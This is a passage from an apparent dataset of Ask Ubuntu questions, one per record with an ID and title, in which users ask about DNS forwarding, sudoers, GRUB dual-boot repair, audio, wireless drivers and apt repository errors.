extended-statistics : yes pidfile : `` /var/lib/unbound/unbound.pid '' interface : 192.168.1.101 @ 53 access-control : 192.168.1.0/24 allow port : 53 outgoing-interface : 192.168.1.101 # outgoing-range : 2048 num-queries-per-thread : 1024 do-daemonize : yes do-tcp : yes do-udp : yes tcp-upstream : yes do-ip4 : yes do-ip6 : no # root-hints : `` /etc/unbound/named.cache '' # dlv-anchor-file : `` /var/lib/unbound/dlv.isc.org.key '' cache-min-ttl : 300 cache-max-ttl : 86400 infra-host-ttl : 900 val-bogus-ttl : 900 so-reuseport : no num-threads : 10 prefetch : yes prefetch-key : yes # ssl-upstream : no # val-permissive-mode : yes do-not-query-localhost : yes neg-cache-size : 0k forward-zone : name : `` . '' forward-addr : 202.60.252.9 forward-addr : 202.76.4.18 forward-addr : 202.177.2.2 forward-addr : 202.60.252.8 forward-addr : 202.181.224.2 forward-addr : 202.180.160.1 forward-addr : 8.8.8.8 forward-addr : 8.8.4.4 forward-first : yes any idea ?
468027	changes to sudoers have no effect . following basic ubuntu tutorial	i 'm following along the ubuntu sudoers tutorial . here 's my exact /etc/sudoers file ( screenshot instead of code block because the formatting was getting messed up ) . notice the lines at the bottom which should give the deployer user poweroff and reboot capabilities . the sudoers file is syntactically fine and saves no problem . i 've ended my ssh session and logged in again . $ whoami = > deployer $ reboot = > reboot : need to be root what could the problem be ? some thoughts i 've tried rebooting ( with sudo ) and still there 's no effect my shell is zsh i predict i 'm going to kicking myself when i get an answer .
468030	how to reset grub to see both windows 7 and ubuntu 12.04 ?	after reinstalling windows 7 on my computer i receive the follow error on bootup bootmgr error i can only boot into windows if i unplug the linux hard drive and i can only boot into linux if i press esc to open the bios and select the linux hard drive . i tried using update grub-install but that did not seem to help . how do i get grub back to its original self with both oss to boot into from the grub menu ? below is my sudo update-grub command : $ sudo update-grub [ sudo ] password for gin : generating grub.cfg ... warning : setting grub_timeout to a non-zero value when grub_hidden_timeout is set is no longer supported . found linux image : /boot/vmlinuz-3.8.0-39-generic found initrd image : /boot/initrd.img-3.8.0-39-generic found linux image : /boot/vmlinuz-3.8.0-37-generic found initrd image : /boot/initrd.img-3.8.0-37-generic found linux image : /boot/vmlinuz-3.8.0-36-generic found initrd image : /boot/initrd.img-3.8.0-36-generic found linux image : /boot/vmlinuz-3.8.0-35-generic found initrd image : /boot/initrd.img-3.8.0-35-generic found linux image : /boot/vmlinuz-3.8.0-34-generic found initrd image : /boot/initrd.img-3.8.0-34-generic found linux image : /boot/vmlinuz-3.8.0-29-generic found initrd image : /boot/initrd.img-3.8.0-29-generic found memtest86+ image : /boot/memtest86+.bin done below is my fdisk command $ sudo fdisk -l [ sudo ] password for gin : disk /dev/sda : 120.0 gb , 120000000000 bytes 255 heads , 63 sectors/track , 14589 cylinders , total 234375000 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000764a1 device boot start end blocks id system /dev/sda1 * 2048 226250751 113124352 83 linux /dev/sda2 226252798 234373119 4060161 5 extended /dev/sda5 226252800 234373119 4060160 82 linux swap / solaris warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 256 heads , 63 sectors/track , 121126 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x8d19c4c4 device boot start end blocks id system /dev/sdb1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdg : 4009 mb , 4009754624 bytes 145 heads , 48 sectors/track , 1125 cylinders , total 7831552 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0004e24a device boot start end blocks id system /dev/sdg1 * 48 7831551 3915752 7 hpfs/ntfs/exfat disk /dev/mapper/cryptswap1 : 4157 mb , 4157603840 bytes 255 heads , 63 sectors/track , 505 cylinders , total 8120320 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x45a3a931 disk /dev/mapper/cryptswap1 does n't contain a valid partition table my first attempt at how can i repair grub ? ( how to get ubuntu back after installing windows ? ) $ sudo mount /dev/sda /mnt mount : /dev/sda already mounted or /mnt busy gin @ ger : ~ $ for i in /sys /proc /run /dev ; do sudo mount -- bind `` $ i '' `` /mnt $ i '' ; done mount : mount point /mnt/sys does not exist mount : mount point /mnt/proc does not exist mount : mount point /mnt/run does not exist mount : mount point /mnt/dev does not exist gin @ ger : ~ $ sudo chroot /mnt chroot : failed to run command `/bin/bash ' : no such file or directory below is my boot order : uefi boot sources windows boot manager legacy boot sources hard drive sato0 sato1 network controller ( realtek pxe b07 d00 )
468035	headphones not working in ubuntu 13.06 - mac laptop	i have a mac laptop with ubuntu installed on it . the version of the ubuntu os is 13.06 . it is an old generation mac book . the mic and the speaker works fine but when i plug in the headphones , no sound is detected in the headphones . the laptop definitely detects it because in the 'sound settings ' program , the speaker icon/label switches to headphones , but sound continues coming from the speaker.. i saw a couple of posts re : alsa base conf edits but i could not get them to work . can anyone be kind enough to help me get the headphones to work ? thanks !
468036	what is the difference between running a game and a virtual linux os in windows versus running linux with a virtual os of windows running a game ?	i have a graphic intensive game on windows . my computer can dual boot between ubuntu and windows , but not at the same time . i theoretically have the option to run one os as a virtual os inside of the other . what is the difference between running a game and a virtual linux os in windows versus running linux with a virtual os of windows running a game ?
468037	usb-creator-gtk does n't find my virtual disk . what 's wrong ?	i know how to create a usb stick allowing installation of ubuntu , but now i 'd like to do some tests with usb-creator . and instead of making useless writings onto my usb stick , i wanted to see how usb-creator-gtk works on a `` virtual disk-partition '' . the trouble is that when i launch usb-creator-gtk , it finds my /dev/sdb2 ( real usb formatted as fat32 ) but not any virtual disk that i made . and i have no idea why . i suppose that usb-creator-gtk has a way to recognize usb stick devices , but i do n't know how to trick it . here is what i did to create my virtual disk : mkdir /tmp/t7 ; cd /tmp/t7 dd if=/dev/null of=vu7 bs=1 seek=3800m count=0 losetup /dev/loop7 vu7 sfdisk -um /dev/loop7 < < eof > 10,3000 , c , * > ; > eof fdisk -l /dev/loop7 # device boot start end blocks id system # /dev/loop7p1 * 16065 6168959 3076447+ c w95 fat32 ( lba ) # /dev/loop7p2 1 16064 8032 83 linux mknod /dev/loop7p1 b 7 8 losetup /dev/loop7p1 -o $ ( ( 512 * 16065 ) ) -- sizelimit $ ( ( ( 6168959-16065 ) *512 ) ) vu7 mkfs.vfat -f 32 /dev/loop7p1 # -- > mkfs.fat 3.0.26 ( 2014-03-07 ) # -- > loop device does not match a floppy size , using default hd params install-mbr /dev/loop7 partprobe /dev/loop7 partprobe /dev/loop7p1 but in the end usb-creator-gtk completly ignores my loop7p1 device .
468044	extremely slow connection with bcm4318 wireless card and ubuntu 14.04	i 'm getting terrible internet speeds on my computer running ubuntu 14.04 with a broadcom bcm4318 wireless card . i have 20 mb/s internet and when i run a speed test , i 'm not even getting 1 mb/s . i run speedtest from my phone while i 'm at my desk and get close to 20 mb/s . i have similar results from a windows laptop and a windows pc , both just under 20 mb/s . i never had a problem until i upgraded to 14.04 from 13.10 . i did a fresh install as well . the issue did not start right away so i 'm not really sure if it could be the upgrade . here are a few things i 've already tried : blacklist wl blacklist brcmsmac sudo apt-get purge bcmwl-kernel-source set ipv6 to 'ignore' purging the b43 driver and manually re-installing purging the b43 driver and re-installing with sudo apt-get install firmware-b43-installer i ran the wireless script and here are the results . here is a screenshot with the results from two of the speedtests that i ran . on the left is from the slow computer and the right is from my phone . thanks for any help !
468045	ordering-override.keyfile does not contain my indicator apps , how else can i re-organize them ? 14.04	i have several apps in my indicator panel , and they are n't in the order they are supposed to be . after many searches i have yet to find an answer that will solve my problem . the only answer i find is telling me to edit /usr/share/indicator-application/ordering-override.keyfile here is what my indicator panel looks like ( i 'd post an image , i ca n't do that because of this god awful reputation system.. you 'll just have to assume i have many indicator icons . ) here is the output of cat /usr/share/indicator-application/ordering-override.keyfile [ ordering index overrides ] nm-applet=1 gnome-power-manager=2 ibus=3 gst-keyboard-xkb=4 gsd-keyboard-xkb=5 obviously this is not a list of apps in my indicator panel . dropbox , indicator-multiload , my-weather-indicator , etc are not showing in the file . anybody have any ideas ? i have rebooted , restarted , re-installed libappindicator1 , etc ... ugh .
468055	d-link dwm-156 modem gets detected on ubuntu 14.04lts 64-bit but not get conected to internet	i am a dedicated admirer of ubuntu operating system . i have been using ubuntu for a long time since ubuntu 11.04 . i have a d-link dwm-156 modem . it was easy to work with this modem on ubuntu 11.10 . it also worked great on ubuntu 12.04 ,12.10 , 13.04 and 13.10 . there i needed to install dlinkusbmodem.deb that comes with it with some 32bit library to make it work on 64-bit ubuntu . but now i have upgraded to ubuntu 14.04lts 64-bit from ubuntu13.10 64-bit . ubuntu 14.04lts detect my modem in network manager but when i click on it to connect , it does n't get connected and led of my modem start blinking . how to resolve this problem and how to make my modem which contain 32bit driver works great again ?
468056	themes for ubuntu 14.04	i want to download themes for ubuntu 14.04 , but i was confused because in the folder /usr/share/themes there are 18 folder . and the only folder that contains gtk-2.0 , gtk-3.0 , metacity-1 , unity , and one file 'index.theme ' that can be used for theme . so i had to have a theme with gtk-2.0 , gtk-3.0 , metacity-1 , unity , and the file 'index.theme ' ?
468058	repositories error	i was using 14.04 beta , when the stable release rolled out , i thought that it might update to stable but now i keep getting these messeges with sudo apt-get update , and a similar one with synaptic ign cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) trusty release.gpg ign cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) trusty release err cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) trusty/main amd64 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) trusty/restricted amd64 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) trusty/main i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms err cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) trusty/restricted i386 packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms ign cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) trusty/main translation-en_us ign cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) trusty/main translation-en ign cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) trusty/restricted translation-en_us ign cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) trusty/restricted translation-en ign http : //dl.google.com stable inrelease ign http : //dl.google.com stable inrelease hit http : //dl.google.com stable release.gpg hit http : //dl.google.com stable release.gpg hit http : //dl.google.com stable release hit http : //dl.google.com stable release hit http : //dl.google.com stable/main amd64 packages hit http : //dl.google.com stable/main i386 packages hit http : //dl.google.com stable/main amd64 packages hit http : //dl.google.com stable/main i386 packages get:1 https : //download.01.org trusty inrelease ign https : //download.01.org trusty inrelease get:2 https : //download.01.org trusty/main amd64 packages/diffindex ign https : //download.01.org trusty/main amd64 packages/diffindex ign https : //download.01.org trusty/main i386 packages/diffindex ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //dl.google.com stable/main translation-en_us ign http : //dl.google.com stable/main translation-en ign http : //archive.ubuntu.com trusty inrelease ign http : //extras.ubuntu.com trusty inrelease ign http : //archive.ubuntu.com trusty-updates inrelease ign http : //archive.canonical.com trusty inrelease ign http : //archive.ubuntu.com trusty-backports inrelease hit http : //extras.ubuntu.com trusty release.gpg hit http : //archive.canonical.com trusty release.gpg ign http : //archive.ubuntu.com trusty-security inrelease hit http : //extras.ubuntu.com trusty release ign http : //archive.ubuntu.com trusty-proposed inrelease hit http : //archive.canonical.com trusty release hit http : //archive.ubuntu.com trusty release.gpg hit http : //extras.ubuntu.com trusty/main amd64 packages hit http : //archive.canonical.com trusty/partner amd64 packages hit http : //archive.ubuntu.com trusty-updates release.gpg hit http : //extras.ubuntu.com trusty/main i386 packages hit http : //archive.ubuntu.com trusty-backports release.gpg hit http : //archive.canonical.com trusty/partner i386 packages hit http : //archive.ubuntu.com trusty-security release.gpg hit http : //archive.ubuntu.com trusty-proposed release.gpg hit http : //archive.ubuntu.com trusty release hit http : //archive.ubuntu.com trusty-updates release hit http : //archive.ubuntu.com trusty-backports release hit http : //archive.ubuntu.com trusty-security release hit http : //archive.ubuntu.com trusty-proposed release hit http : //archive.ubuntu.com trusty/main sources hit http : //archive.ubuntu.com trusty/restricted sources hit http : //archive.ubuntu.com trusty/universe sources hit http : //archive.ubuntu.com trusty/multiverse sources hit http : //archive.ubuntu.com trusty/main amd64 packages hit https : //download.01.org trusty/main amd64 packages ign http : //extras.ubuntu.com trusty/main translation-en_us ign http : //extras.ubuntu.com trusty/main translation-en ign http : //archive.canonical.com trusty/partner translation-en_us hit http : //archive.ubuntu.com trusty/restricted amd64 packages hit http : //archive.ubuntu.com trusty/universe amd64 packages ign http : //archive.canonical.com trusty/partner translation-en hit http : //archive.ubuntu.com trusty/multiverse amd64 packages hit http : //archive.ubuntu.com trusty/main i386 packages hit https : //download.01.org trusty/main i386 packages hit http : //archive.ubuntu.com trusty/restricted i386 packages hit http : //archive.ubuntu.com trusty/universe i386 packages hit http : //archive.ubuntu.com trusty/multiverse i386 packages get:3 https : //download.01.org trusty/main translation-en_us ign https : //download.01.org trusty/main translation-en_us hit http : //archive.ubuntu.com trusty/main translation-en ign https : //download.01.org trusty/main translation-en hit http : //archive.ubuntu.com trusty/multiverse translation-en ign http : //ppa.launchpad.net saucy inrelease hit http : //archive.ubuntu.com trusty/restricted translation-en hit http : //ppa.launchpad.net saucy release.gpg hit http : //archive.ubuntu.com trusty/universe translation-en hit http : //ppa.launchpad.net saucy release hit http : //archive.ubuntu.com trusty-updates/main sources hit http : //ppa.launchpad.net saucy/main amd64 packages hit http : //archive.ubuntu.com trusty-updates/restricted sources hit http : //archive.ubuntu.com trusty-updates/universe sources hit http : //ppa.launchpad.net saucy/main i386 packages hit http : //archive.ubuntu.com trusty-updates/multiverse sources hit http : //archive.ubuntu.com trusty-updates/main amd64 packages hit http : //archive.ubuntu.com trusty-updates/restricted amd64 packages hit http : //archive.ubuntu.com trusty-updates/universe amd64 packages hit http : //archive.ubuntu.com trusty-updates/multiverse amd64 packages hit http : //archive.ubuntu.com trusty-updates/main i386 packages hit http : //archive.ubuntu.com trusty-updates/restricted i386 packages hit http : //archive.ubuntu.com trusty-updates/universe i386 packages hit http : //archive.ubuntu.com trusty-updates/multiverse i386 packages hit http : //archive.ubuntu.com trusty-updates/main translation-en hit http : //archive.ubuntu.com trusty-updates/multiverse translation-en ign http : //ppa.launchpad.net saucy/main translation-en_us ign http : //ppa.launchpad.net saucy/main translation-en hit http : //archive.ubuntu.com trusty-updates/restricted translation-en hit http : //archive.ubuntu.com trusty-updates/universe translation-en hit http : //archive.ubuntu.com trusty-backports/main sources hit http : //archive.ubuntu.com trusty-backports/restricted sources hit http : //archive.ubuntu.com trusty-backports/universe sources hit http : //archive.ubuntu.com trusty-backports/multiverse sources hit http : //archive.ubuntu.com trusty-backports/main amd64 packages hit http : //archive.ubuntu.com trusty-backports/restricted amd64 packages hit http : //archive.ubuntu.com trusty-backports/universe amd64 packages hit http : //archive.ubuntu.com trusty-backports/multiverse amd64 packages hit http : //archive.ubuntu.com trusty-backports/main i386 packages hit http : //archive.ubuntu.com trusty-backports/restricted i386 packages hit http : //archive.ubuntu.com trusty-backports/universe i386 packages hit http : //archive.ubuntu.com trusty-backports/multiverse i386 packages hit http : //archive.ubuntu.com trusty-backports/main translation-en hit http : //archive.ubuntu.com trusty-backports/multiverse translation-en hit http : //archive.ubuntu.com trusty-backports/restricted translation-en hit http : //archive.ubuntu.com trusty-backports/universe translation-en hit http : //archive.ubuntu.com trusty-security/main sources hit http : //archive.ubuntu.com trusty-security/restricted sources hit http : //archive.ubuntu.com trusty-security/universe sources hit http : //archive.ubuntu.com trusty-security/multiverse sources hit http : //archive.ubuntu.com trusty-security/main amd64 packages hit http : //archive.ubuntu.com trusty-security/restricted amd64 packages hit http : //archive.ubuntu.com trusty-security/universe amd64 packages hit http : //archive.ubuntu.com trusty-security/multiverse amd64 packages hit http : //archive.ubuntu.com trusty-security/main i386 packages hit http : //archive.ubuntu.com trusty-security/restricted i386 packages hit http : //archive.ubuntu.com trusty-security/universe i386 packages hit http : //archive.ubuntu.com trusty-security/multiverse i386 packages hit http : //archive.ubuntu.com trusty-security/main translation-en hit http : //archive.ubuntu.com trusty-security/multiverse translation-en hit http : //archive.ubuntu.com trusty-security/restricted translation-en hit http : //archive.ubuntu.com trusty-security/universe translation-en get:4 http : //archive.ubuntu.com trusty-proposed/restricted amd64 packages [ 14 b ] get:5 http : //archive.ubuntu.com trusty-proposed/multiverse amd64 packages [ 14 b ] get:6 http : //archive.ubuntu.com trusty-proposed/universe amd64 packages [ 34.9 kb ] get:7 http : //archive.ubuntu.com trusty-proposed/main amd64 packages [ 63.9 kb ] get:8 http : //archive.ubuntu.com trusty-proposed/restricted i386 packages [ 14 b ] get:9 http : //archive.ubuntu.com trusty-proposed/multiverse i386 packages [ 14 b ] get:10 http : //archive.ubuntu.com trusty-proposed/universe i386 packages [ 35.2 kb ] get:11 http : //archive.ubuntu.com trusty-proposed/main i386 packages [ 60.8 kb ] hit http : //archive.ubuntu.com trusty-proposed/main translation-en hit http : //archive.ubuntu.com trusty-proposed/multiverse translation-en hit http : //archive.ubuntu.com trusty-proposed/restricted translation-en hit http : //archive.ubuntu.com trusty-proposed/universe translation-en ign http : //archive.ubuntu.com trusty/main translation-en_us ign http : //archive.ubuntu.com trusty/multiverse translation-en_us ign http : //archive.ubuntu.com trusty/restricted translation-en_us ign http : //archive.ubuntu.com trusty/universe translation-en_us ign http : //archive.ubuntu.com trusty-updates/main translation-en_us ign http : //archive.ubuntu.com trusty-updates/multiverse translation-en_us ign http : //archive.ubuntu.com trusty-updates/restricted translation-en_us ign http : //archive.ubuntu.com trusty-updates/universe translation-en_us ign http : //archive.ubuntu.com trusty-backports/main translation-en_us ign http : //archive.ubuntu.com trusty-backports/multiverse translation-en_us ign http : //archive.ubuntu.com trusty-backports/restricted translation-en_us ign http : //archive.ubuntu.com trusty-backports/universe translation-en_us ign http : //archive.ubuntu.com trusty-security/main translation-en_us ign http : //archive.ubuntu.com trusty-security/multiverse translation-en_us ign http : //archive.ubuntu.com trusty-security/restricted translation-en_us ign http : //archive.ubuntu.com trusty-security/universe translation-en_us ign http : //archive.ubuntu.com trusty-proposed/main translation-en_us ign http : //archive.ubuntu.com trusty-proposed/multiverse translation-en_us ign http : //archive.ubuntu.com trusty-proposed/restricted translation-en_us ign http : //archive.ubuntu.com trusty-proposed/universe translation-en_us fetched 198 kb in 49s ( 3,992 b/s ) w : gpg error : https : //download.01.org trusty inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey a902dda375e52366 w : failed to fetch cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) /dists/trusty/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) /dists/trusty/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) /dists/trusty/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 14.04 lts _trusty tahr_ - beta amd64 ( 20140326 ) /dists/trusty/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . any idea how to solve this ?
468060	problem in installing gedit-gmate on ubuntu 14.4 lts	i am tring to install gedit-gmate on ubuntu 14.4 lts and i have made these commands : sudo apt-add-repository ppa : ubuntu-on-rails/ppa update using : sudo apt-get update then install using : sudo apt-get install gedit-gmate and that is the output ! so what is the problem ? how to be fixed ? root @ amr-lenovo-ideapad-z500 : /home/amr # sudo apt-get install gedit-gmate reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : gedit-gmate 0 upgraded , 1 newly installed , 0 to remove and 128 not upgraded . need to get 0 b/238 kb of archives . after this operation , 1,655 kb of additional disk space will be used . ( reading database ... 165019 files and directories currently installed . ) preparing to unpack ... /gedit-gmate_0.12~uorppa0_amd64.deb ... unpacking gedit-gmate ( 0.12~uorppa0 ) ... dpkg : error processing archive /var/cache/apt/archives/gedit- gmate_0.12~uorppa0_amd64.deb ( -- unpack ) : trying to overwrite '/usr/share/gtksourceview-3.0/language-specs/julia.lang ' , which is also in package libgtksourceview-3.0-common 3.10.2-0ubuntu1 processing triggers for shared-mime-info ( 1.2-0ubuntu3 ) ... processing triggers for libglib2.0-0 : amd64 ( 2.40.0-2 ) ... errors were encountered while processing : /var/cache/apt/archives/gedit-gmate_0.12~uorppa0_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
468063	how do i export a playlist to ipod using audacious ?	i try exporting playlists to my ipod using audacious but it asks me to type in a file name also , is there a better way to add music to my ipod ? i am running lubuntu
468064	does ubuntu touch has mp3/mp4 playback support by default ?	i believe these are essential for apps like youtube , but the codecs are closed source . how does ubuntu touch resolves this issue ? does it use vlc as the backend ?
468068	ubuntu 13.10 audio issue	last week i 've tried to hear my microphone in ubuntu 13.10 , i 've searched and changed several settings until i 've done it , but now speakers do a constant shhh and sound quality recorder from microphone is awful , i think i 've changed some configuration or drivers , is there any way to correct them ? thanks .
468072	monitor mode on broadcom 4322 with 'wl '	i have a laptop that i would like to use wireshark on . i 've tried echo 1 > /proc/brcm_monitor0 , echo 1 | sudo tee /proc/brcm_monitor 0 , and manually typing a 1 into the file . while the first two give an input/output error , the third way gives a kernel panic and i have to forecfully shutdown . i am running a dell studio 1535 . is there a way to enable monitor mode ? edit : is there any way to enable monitor mode without the b43 driver , since the already weak signal drops to almost unusable . i 'm also running a bcm4322 device , with an id of 14e4:432b
468073	nvidia geforce go 7150m issues on ubuntu 12.04	the graphics card is not working correctly . the screen goes black , and when i click in the dash there is distortion in the screen .
468076	same accounts on all home computers	i 'm trying to set up our home computers so that they have the same user accounts- meaning we can log in to any of our ubuntu 14.04 , windows 7 home premium , and os x mountain lion computers and access our files , and have our own desktop background etc . would this be possible without buying any new computers/upgrades ? thanks , archie . edit : just clarifying , i do n't want local accounts- accounts in a domain like config are what i need . i do n't mind if they are local accounts with cloud storage or similar .
468077	swap partition showing unknown . can i format it to ntfs or ext4 for keeping my files or this will cause problems to system ? i do n't need swap space	the gnome disk utility shows a partition with 3.1 gb is linux swap with unknown content . in a terminal running free command total swap shows 0 . what does this mean ? i do n't need any swap space , so can i format this partition to ntfs or ext4 safely ( without disturbing the system ) ? [ edit ] i have encrypted /home . i have 3 gb ram and i do n't have to run any heavy application in ubuntu so i do n't need swap . during installation , i allocated 13 gb to ubuntu of which only 1.5 gb is left . .in gnome disk utility it is showing 3.1 gb is linux swap but in gparted it is not recognized as linux swap ( it just says unknown ) . so i want to just format it . my question is : does deleting or formatting that partition cause any error ? ( if yes , then i will drop this option and increase my partition size instead . )
468083	set all .jar files as executable	i run java programs alot on my computer . it runs the latest version of openjdk , which is openjdk 7 . when i try to run a .jar file , it gives me an error saying that the .jar file was not marked as executable . i know how to make a .jar file executable from the terminal , but i am wondering if there is a setting where all .jar files i download will be marked as executable automatically . does such a setting even exist , or do i just have do deal with manually making every .jar file i download executable ?
468085	re installation of bluedevil or any substitute for it	i have kubuntu 14.04 but i 've uninstalled bluedevil with deals with bluetooth . and now i am not able to use bluetooth . when i try to re install it gives the following note `` the `` bluedevil '' package could not be marked for installation or upgrade : depends : bluedevil , but it is not installable '' via muon package manager . so how to reinstall it or any other substitute for it.outcome of `` sudo apt-get install bluedevil '' as follows sudo apt-get install bluedevil [ sudo ] password for mahesh : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : bluedevil : depends : obex-data-server but it is not going to be installed e : unable to correct problems , you have held broken packages .
468093	logitech headset usb not working properly on kubuntu 14.04	i have a logitech usb headset . it worked fine on kubuntu 13.04 , 64 bits , but not on kubuntu 14.04 , 64 bits . when i plug in the headset , kmix does not show it on the master channel window ( right click on kmix icon at system tray -- - select master channel ... ) . but , when i restart the computer , with the headset plugged in , then , it appears in the kmix master channel window . on kubuntu 13.04 , it appears when i plug it at any moment , no restart is required . the following appear when i open ksystemlog and plug the usb headset : 05/16/14 10:52:23 pm gtronick kernel [ 10074.604429 ] usb 2-1.2 : new full-speed usb device number 12 using ehci-pci 05/16/14 10:52:24 pm gtronick kernel [ 10074.703476 ] usb 2-1.2 : new usb device found , idvendor=046d , idproduct=0a0b 05/16/14 10:52:24 pm gtronick kernel [ 10074.703488 ] usb 2-1.2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 05/16/14 10:52:24 pm gtronick kernel [ 10074.703495 ] usb 2-1.2 : product : logitech usb headset 05/16/14 10:52:24 pm gtronick kernel [ 10074.703500 ] usb 2-1.2 : manufacturer : logitech 05/16/14 10:52:24 pm gtronick kernel [ 10074.735240 ] input : logitech logitech usb headset as /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.3/input/input24 05/16/14 10:52:24 pm gtronick kernel [ 10074.735545 ] hid-generic 0003:046d:0a0b.0008 : input , hidraw0 : usb hid v1.00 device [ logitech logitech usb headset ] on usb-0000:00:1d.0-1.2/input3 05/16/14 10:52:24 pm gtronick mtp-probe checking bus 2 , device 12 : `` /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2 '' 05/16/14 10:52:24 pm gtronick mtp-probe bus : 2 , device : 12 was not an mtp device 05/16/14 10:52:24 pm gtronick rtkit-daemon [ 1843 ] successfully made thread 4108 of process 2129 ( n/a ) owned by '1000 ' rt at priority 5 . 05/16/14 10:52:24 pm gtronick rtkit-daemon [ 1843 ] supervising 7 threads of 2 processes of 1 users . then , i open the kmix master channel window , but the headset is not shown any help is appreciated , thanks in advance ... [ update 28/05/14 ( dd/mm/yy ) last update ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - recently , i have found another solution . this consist on : if usb headset is not recognized : unplug it right click on kmix tray icon select master channel on the kmix window , click on cancel button plug your headset in right click on kmix tray icon the usb headset now must be shown [ updates ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- after computer reboot with the headset plugged in , the headset work fine . i have removed it from pc , then replug it , and work again , kmix show it . now it detects it at any moment ! . is something strange . haha ! i have detected something strange , if i reboot the computer without the headset plugged in , kmix show it when i plug it in . but , if i have the headset plugged in , and go to the kmix icon , and select master channel , and then , select the default laptop sound hardware , then , if i unplug the headset ant replug it , it is not shown on kmix master channel window . and here is the solution ! : if headset is not detected on kmix master channel window , do the following : first unplug the headset , if it was plugged in before ... right click on kmix icon on system tray . click on `` select master channel ... '' clik on the round check button , left to the name of the default listed hardware ( make sure you click on the round button ! it must be filled ) close the master channel window plug the headset in . go to kmix master channel chooser again now , the headset must be shown i suppose that is a software issue , related to kmix , but i am not sure .
468094	ubuntu 14.04 vm setup using virtual box	i am trying to create a ubuntu 14.04 vm using virtualbox . after reading the iso , the vm completes copying the files and asks for a restart , then gets stuck at this message : i have tried it twice , the vm never restarts . my host machine is ubuntu 12.04 lts . virtualbox version is 4.3.10 . can someone please suggest a way to solve this ? thanks .
468097	weird possibly acpi related behavior on 14.04	since upgrading my notebook to 14.04 i 've observed a weird behavior , possibly tied to acpi ; sometimes on boot , hotkeys like ctrl + alt + t and function-keys like fn + ⌨ ( for keyboard-backlight control ) will stop working . also , gnome extensions get disabled , all of them . i can reenable these . so in order to control my keyboard 's backlight i resort to : echo < something between 0 and 3 > | sudo tee `` /sys/class/leds/asus : :kbd_backlight/brightness '' and for screen backlight : echo < something between 0 and 5 > | sudo tee `` /sys/class/backlight/acpi_video0/brightness '' what i 've noticed is that in the seldom cases where my os boots normally ( i.e . with hotkeys and gnome extensions ) then the value range of the latter command changes from between 0 and 10 to between 0 and 100 . it 's undeterministic ; sometimes everything works , most times nothing does .
468098	lost nvidia driver	i installed my drivers for my nvidia graphics card , and when i went to config using the command : sudo nvidia-xconfig i got the message : warning : unable to locate/open x configuration file . new x configuration file written to '/etc/x11/xorg.conf now when i type in the command i get the message : using x configuration file : `` /etc/x11/xorg.conf '' . backed up file '/etc/x11/xorg.conf ' as '/etc/x11/xorg.conf.backup' new x configuration file written to '/etc/x11/xorg.conf' what the hell is going on ?
468099	cant boot bios ubuntu 14.04	i installed ubuntu 14.04 , and got rid of my windows os , on to my dell inspiron 7740 and i can no longer access my bios . when i start my laptop i hit f12 and i go straight into ubuntu and the same thing happens when i hit f2 . what should i do and how can i fix this ?
